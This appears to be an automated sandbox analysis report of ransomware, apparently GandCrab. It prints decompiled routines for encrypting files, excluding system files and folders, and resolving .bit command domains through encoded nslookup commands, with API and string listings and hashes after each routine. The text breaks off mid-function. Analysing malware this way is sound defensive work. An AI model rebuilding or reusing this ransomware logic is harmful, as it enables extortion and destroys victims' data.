									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0F698B20(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0F6936D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

0x0f6937bb
0x0f6937bd
0x0f6937c1
0x0f6937cf
0x0f6937d8
0x0f6937e3
0x0f6937ef
0x0f6937f1
0x0f69380c
0x0f69380e
0x0f693817
0x0f69381a
0x0f693821
0x0f693828
0x0f693833
0x0f693839
0x0f693846
0x0f69384e
0x0f69384f
0x0f69385a
0x0f69385f
0x0f693863
0x0f69386b
0x0f693870
0x0f693880
0x0f693896
0x0f693898
0x0f6938ae
0x0f6938b4
0x0f6938b9
0x0f6938bc
0x0f6938c1
0x0f6938c3
0x0f6938c8
0x0f6938d3
0x0f6938d6
0x0f6938da
0x0f6938e1
0x0f6938ef
0x0f6938f4
0x0f6938f9
0x0f693937
0x0f69393c
0x0f693941
0x0f693970
0x0f693975
0x0f693993
0x0f693995
0x0f69399b
0x0f6939db
0x0f6939e9
0x0f6939ef
0x0f6939f6
0x0f6939f8
0x0f6939fa
0x0f6939fd
0x0f693a05
0x0f693a20
0x0f693a25
0x0f693a2b
0x0f693a37
0x0f693a3a
0x0f693a3d
0x0f693a3f
0x0f693a42
0x0f693a45
0x0f693a4a
0x0f693a50
0x0f693a50
0x0f693a51
0x0f693a55
0x0f693a55
0x0f693a6b
0x0f693a72
0x0f693a77
0x0f693a7a
0x0f693a7d
0x0f693a92
0x0f693aaa
0x0f693aaf
0x0f693ab2
0x0f693ab2
0x0f693abf
0x0f693ad2
0x0f693aed
0x0f693aef
0x0f693af4
0x0f693af4
0x0f693aff
0x0f693b05
0x0f693b0a
0x0f693a02
0x00000000
0x0f693a02
0x0f693b0a
0x00000000
0x0f693a25
0x0f693b20
0x0f693b26
0x0f693b37
0x0f693b4c
0x0f693b5c
0x0f693b5c
0x0f693b63
0x0f693b76
0x0f693b79
0x0f693b85
0x0f693b91
0x0f693b97
0x0f693b9f
0x0f693b9f
0x0f693ba5
0x0f69399d
0x0f6939ab
0x0f6939b7
0x0f6939b9
0x0f6939bc
0x0f6939c4
0x0f6939c4
0x0f693943
0x0f693943
0x0f69394f
0x0f693952
0x0f69395a
0x0f69395a
0x0f6938fb
0x0f693908
0x0f693914
0x0f693917
0x0f69391f
0x0f69391f
0x0f693bb2
0x0f693bbe

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F6937C4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F6937CF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F69380A
lstrcpyW.KERNEL32 ref: 0F693828
lstrcatW.KERNEL32(00000000,0043002E), ref: 0F693833

Part of subcall function 0F698400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F698420
Part of subcall function 0F698400: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F698448
Part of subcall function 0F698400: GetModuleHandleA.KERNEL32(?), ref: 0F69849D
Part of subcall function 0F698400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F6984AB
Part of subcall function 0F698400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F6984BA
Part of subcall function 0F698400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F6984DE
Part of subcall function 0F698400: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F6984EC

Part of subcall function 0F698400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F69292B), ref: 0F698500
Part of subcall function 0F698400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F69292B), ref: 0F69850E

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F693896
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F6938C1

Part of subcall function 0F696660: EnterCriticalSection.KERNEL32(0F6A2A48,?,0F6938F4,00000000,00000000,00000000,?,00000800), ref: 0F69666B
Part of subcall function 0F696660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F6938F4,00000000,00000000,00000000), ref: 0F696691
Part of subcall function 0F696660: GetLastError.KERNEL32(?,0F6938F4,00000000,00000000,00000000), ref: 0F69669B
Part of subcall function 0F696660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F6938F4,00000000,00000000,00000000), ref: 0F6966B7

MessageBoxA.USER32 ref: 0F693908
GetLastError.KERNEL32 ref: 0F693943
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F693BB2

Strings

Fatal error, xrefs: 0F6938FD
, xrefs: 0F6938DA
R, xrefs: 0F69381A
., xrefs: 0F69380E
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0F693902
B, xrefs: 0F693821

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
API String ID: 1177701972-4284454829
Opcode ID: 17b36a7337f447b4794d821fd835194f67628068d3d8ffa21f802b74e5f94eb7
Instruction ID: 20d280173cf599dedce68a6f3fe5e8f4fe3e11b9df4d3d4b9557bc0e23e2b9b2
Opcode Fuzzy Hash: 17b36a7337f447b4794d821fd835194f67628068d3d8ffa21f802b74e5f94eb7
Instruction Fuzzy Hash: 52C15971E44309ABEB118FA4DC46FAEBBBCFF08710F205115F640BA281DBB969548B64

Uniqueness

Uniqueness Score: -1.00%

Function 0F695060 Relevance: 61.4, APIs: 8, Strings: 27, Instructions: 118
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F695060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t55;
				CHAR* _t62;
				void* _t64;

				_v72 = 0x73006e;
				_t55 = __edx;
				_v20 = 0;
				_t62 = __ecx;
				_v76 = 0;
				_v68 = 0x6f006c;
				_t41 =  !=  ?  &_v128 :  &_v72;
				_v64 = 0x6b006f;
				_a4 =  !=  ?  &_v128 :  &_v72;
				_v60 = 0x700075;
				_v56 = 0x250020;
				_v52 = 0x200053;
				_v48 = 0x73006e;
				_v44 = 0x2e0031;
				_v40 = 0x690076;
				_v36 = 0x6d0072;
				_v32 = 0x630061;
				_v28 = 0x2e0068;
				_v24 = 0x750072;
				_v128 = 0x73006e;
				_v124 = 0x6f006c;
				_v120 = 0x6b006f;
				_v116 = 0x700075;
				_v112 = 0x250020;
				_v108 = 0x200053;
				_v104 = 0x73006e;
				_v100 = 0x2e0032;
				_v96 = 0x690076;
				_v92 = 0x6d0072;
				_v88 = 0x630061;
				_v84 = 0x2e0068;
				_v80 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_t43 = CreatePipe(0xf6a2a70, 0xf6a2a6c,  &_v16, 0);
				if(_t43 != 0) {
					_t43 = SetHandleInformation( *0xf6a2a70, 1, 0);
					if(_t43 == 0) {
						goto L1;
					} else {
						CreatePipe(0xf6a2a68, 0xf6a2a74,  &_v16, 0);
						_t43 = SetHandleInformation( *0xf6a2a74, 1, 0);
						if(_t43 == 0) {
							goto L1;
						} else {
							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t64 == 0) {
								lstrcpyA(_t62, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t64, _a4, _t55);
								E0F694E10(_t64);
								E0F694FB0(_t55, _t62, _t55, _t62, _t64);
								VirtualFree(_t64, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t43 | 0xffffffff;
				}
			}

0x0f69506d
0x0f695078
0x0f69507b
0x0f69507f
0x0f695081
0x0f69508b
0x0f695092
0x0f695095
0x0f69509e
0x0f6950af
0x0f6950b6
0x0f6950bd
0x0f6950c4
0x0f6950cb
0x0f6950d2
0x0f6950d9
0x0f6950e0
0x0f6950e7
0x0f6950ee
0x0f6950f5
0x0f6950fc
0x0f695103
0x0f69510a
0x0f695111
0x0f695118
0x0f69511f
0x0f695126
0x0f69512d
0x0f695134
0x0f69513b
0x0f695142
0x0f695149
0x0f695150
0x0f695157
0x0f69515e
0x0f695165
0x0f69516d
0x0f695189
0x0f69518d
0x00000000
0x0f69518f
0x0f69519f
0x0f6951af
0x0f6951b3
0x00000000
0x0f6951b5
0x0f6951c9
0x0f6951cd
0x0f69520a
0x0f695218
0x0f6951cf
0x0f6951d4
0x0f6951df
0x0f6951e8
0x0f6951f5
0x0f695203
0x0f695203
0x0f6951cd
0x0f6951b3
0x0f69516f
0x0f69516f
0x0f695178
0x0f695178

APIs

CreatePipe.KERNEL32(0F6A2A70,0F6A2A6C,?,00000000,00000001,00000001,00000000), ref: 0F695165
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F695189
CreatePipe.KERNEL32(0F6A2A68,0F6A2A74,0000000C,00000000), ref: 0F69519F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F6951AF
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F6951C3
wsprintfW.USER32 ref: 0F6951D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F6951F5

Strings

S, xrefs: 0F695118
v, xrefs: 0F6950D2
n, xrefs: 0F69511F
u, xrefs: 0F6950AF
a, xrefs: 0F69513B
n, xrefs: 0F69506D
, xrefs: 0F6950B6
1, xrefs: 0F6950CB
r, xrefs: 0F6950EE
h, xrefs: 0F6950E7
r, xrefs: 0F695134
l, xrefs: 0F69508B
r, xrefs: 0F6950D9
o, xrefs: 0F695095
v, xrefs: 0F69512D
o, xrefs: 0F695103
S, xrefs: 0F6950BD
fabian wosar <3, xrefs: 0F695204
h, xrefs: 0F695142
r, xrefs: 0F695149
2, xrefs: 0F695126
u, xrefs: 0F69510A
a, xrefs: 0F6950E0
n, xrefs: 0F6950F5
n, xrefs: 0F6950C4
l, xrefs: 0F6950FC
, xrefs: 0F695111

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
API String ID: 1490407255-3072057902
Opcode ID: 10da9205b6fea66cc6de24282f01d4f77f09bfef50b41e7b8966d79d9fe2f65a
Instruction ID: 347278bf0f721771453aba83a0928fc37f0422826c7e611f184e1ec140a75aac
Opcode Fuzzy Hash: 10da9205b6fea66cc6de24282f01d4f77f09bfef50b41e7b8966d79d9fe2f65a
Instruction Fuzzy Hash: 12415B70E44308ABEB108F94DC48BEDBFFAFB04759F104119E904AB282D7FA49598F94

Uniqueness

Uniqueness Score: -1.00%

Function 0F6968F0 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F6968F0(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x0f6968f9
0x0f6968fc
0x0f696901
0x0f696903
0x0f696906
0x0f696909
0x0f69690a
0x0f696910
0x0f696910
0x0f696913
0x0f696914
0x0f696910
0x0f696924
0x0f696931
0x0f696946
0x00000000
0x0f696990
0x0f696996
0x0f69699b
0x0f6969a0
0x0f6969a0
0x0f696935
0x0f696935
0x0f69693b
0x0f69693b

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F696B03), ref: 0F6968FC
lstrlenW.KERNEL32(00000000), ref: 0F696901
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F69692D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F696942
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F69694E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F69695A
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F696966
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F696972
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F69697E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F69698A
lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0F696996

Strings

boot.ini, xrefs: 0F69696C
desktop.ini, xrefs: 0F696927
CRAB-DECRYPT.txt, xrefs: 0F696990
iconcache.db, xrefs: 0F696954
ntuser.dat.log, xrefs: 0F696978
bootsect.bak, xrefs: 0F696960
ntuser.dat, xrefs: 0F696948
autorun.inf, xrefs: 0F69693C
thumbs.db, xrefs: 0F696984

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3936223242
Opcode ID: 1948b0378624a346563f6ddd7f032097bdcd171f586422994592d6e480a95c73
Instruction ID: b074de5f97d9a12d464434e2292af52c606e7ad7f792a129f64c4bab8dc74bef
Opcode Fuzzy Hash: 1948b0378624a346563f6ddd7f032097bdcd171f586422994592d6e480a95c73
Instruction Fuzzy Hash: E711CE6268C727365E20767DEC01EEF238CCDD1A903970225F904E2203EF87EA1385B5

Uniqueness

Uniqueness Score: -1.00%

Function 0F696780 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0F696780(void* __ecx) {
				void* _t12;
				intOrPtr* _t23;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0F6981F0(_t52, L"\\ProgramData\\") != 0 || E0F6981F0(_t52, L"\\IETldCache\\") != 0 || E0F6981F0(_t52, L"\\Boot\\") != 0 || E0F6981F0(_t52, L"\\Program Files\\") != 0 || E0F6981F0(_t52, L"\\Tor Browser\\") != 0 || E0F6981F0(_t52, L"Ransomware") != 0 || E0F6981F0(_t52, L"\\All Users\\") != 0 || E0F6981F0(_t52, L"\\Local Settings\\") != 0) {
					L18:
					VirtualFree(_t51, 0, 0x8000);
					return 0;
				} else {
					_t12 = E0F6981F0(_t52, L"\\Windows\\");
					if(_t12 != 0) {
						goto L18;
					} else {
						_t23 = __imp__SHGetSpecialFolderPathW;
						_push(_t12);
						_push(0x2a);
						_push(_t51);
						_push(_t12);
						if( *_t23() == 0 || E0F6981F0(_t52, _t51) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t51);
							_push(0);
							if( *_t23() == 0 || E0F6981F0(_t52, _t51) == 0) {
								_push(0);
								_push(0x24);
								_push(_t51);
								_push(0);
								if( *_t23() == 0 || E0F6981F0(_t52, _t51) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t51);
									_push(0);
									if( *_t23() == 0 || E0F6981F0(_t52, _t51) == 0) {
										VirtualFree(_t51, 0, 0x8000);
										return 1;
									} else {
										goto L18;
									}
								} else {
									goto L18;
								}
							} else {
								goto L18;
							}
						} else {
							goto L18;
						}
					}
				}
			}

0x0f696791
0x0f6967a0
0x0f6967a9
0x0f6968d4
0x0f6968dd
0x0f6968e8
0x0f69683b
0x0f696842
0x0f696849
0x00000000
0x0f69684f
0x0f69684f
0x0f696855
0x0f696856
0x0f696858
0x0f696859
0x0f69685e
0x0f69686d
0x0f69686f
0x0f696871
0x0f696872
0x0f696878
0x0f696887
0x0f696889
0x0f69688b
0x0f69688c
0x0f696892
0x0f6968a1
0x0f6968a3
0x0f6968a5
0x0f6968a6
0x0f6968ac
0x0f6968c8
0x0f6968d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0f69685e
0x0f696849

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F696E06,00000000,?,?), ref: 0F696793
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F696E06,00000000,?,?), ref: 0F69685A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F696E06,00000000,?,?), ref: 0F696874
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F696E06,00000000,?,?), ref: 0F69688E
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F696E06,00000000,?,?), ref: 0F6968A8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F696E06,00000000,?,?), ref: 0F6968C8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F696E06,00000000,?,?), ref: 0F6968DD

Strings

\Program Files\, xrefs: 0F6967D7
\Tor Browser\, xrefs: 0F6967EB
\All Users\, xrefs: 0F696813
\Windows\, xrefs: 0F69683B
Ransomware, xrefs: 0F6967FF
\Local Settings\, xrefs: 0F696827
\Boot\, xrefs: 0F6967C3
\IETldCache\, xrefs: 0F6967AF
\ProgramData\, xrefs: 0F696799

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
API String ID: 1363212851-3735464813
Opcode ID: 54542a7d1f095c15914935f0884ee5f6ea3c1d673d700357586222d35029361e
Instruction ID: 693e3278970488b1935a121c6150278a4022e245f759c3f298232a7418ba8b08
Opcode Fuzzy Hash: 54542a7d1f095c15914935f0884ee5f6ea3c1d673d700357586222d35029361e
Instruction Fuzzy Hash: FC31212074C76223EE2026764E25B2F608ECFD5A55F91402AAA01DF3D2FF59D90293FD

Uniqueness

Uniqueness Score: -1.00%

Function 0F695220 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0F695220() {
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				short _v40;
				char _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xf6a0540]");
				_v36 =  &_v56;
				asm("movdqu [ebp-0x34], xmm0");
				_v32 =  &_v80;
				asm("movdqa xmm0, [0xf6a0520]");
				_v40 = 0x74;
				asm("movdqu [ebp-0x4c], xmm0");
				_v64 = 0x69622e6d;
				_v60 = 0x74;
				_v24 = 0x62636467;
				_v20 = 0x7469622e;
				_v16 = 0;
				_v28 =  &_v24;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0F695060(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

0x0f695226
0x0f695236
0x0f695241
0x0f695246
0x0f69524c
0x0f69525b
0x0f695261
0x0f695266
0x0f69526d
0x0f695273
0x0f69527a
0x0f695281
0x0f695285
0x0f695288
0x0f69528e
0x0f695290
0x0f695295
0x0f69529b
0x0f69529d
0x0f6952a2
0x0f6952a4
0x0f6952a4
0x0f6952a8
0x0f6952a9
0x0f6952af
0x0f6952b4
0x0f6952b6
0x0f6952b9
0x0f6952b9
0x0f6952be
0x0f6952c5
0x0f6952c5
0x0f6952ec
0x0f6952ef
0x0f6952f1
0x0f6952f6
0x0f6952ff
0x0f695307
0x00000000
0x00000000
0x0f695310
0x0f695316
0x0f695319
0x0f695319
0x0f69531e
0x0f695328
0x0f695339
0x0f69533f
0x0f69533f
0x0f695347

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F695288
Sleep.KERNEL32(000003E8), ref: 0F6952C5
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F6952D3
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F6952E3
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F6952FF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F695310
wsprintfW.USER32 ref: 0F695328
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F695339

Strings

t, xrefs: 0F69525B
m.bi, xrefs: 0F695266
fabian wosar <3, xrefs: 0F6952F9
gdcb, xrefs: 0F695273
t, xrefs: 0F69526D
.bit, xrefs: 0F69527A

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
API String ID: 2709691373-2847225850
Opcode ID: b5b8e41997dc0fa1729d9d8877d8f18ec82de58f32aa98df2d437cd918a9284b
Instruction ID: 3e61c68bfd1717ec37c5951057ca4d1f02243cfba4a38bc51507d98eb63320e2
Opcode Fuzzy Hash: b5b8e41997dc0fa1729d9d8877d8f18ec82de58f32aa98df2d437cd918a9284b
Instruction Fuzzy Hash: B531B271E04309ABDF01CFE4ED85BAEBBFCEF44725F101225F606A6281D7795A108B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F6954F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0F6954F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				char _v28;
				short _v124;
				void* _t40;
				CHAR* _t44;
				CHAR* _t46;
				void* _t47;
				void* _t55;
				void* _t56;
				CHAR* _t58;
				void* _t59;

				_t46 = __ecx;
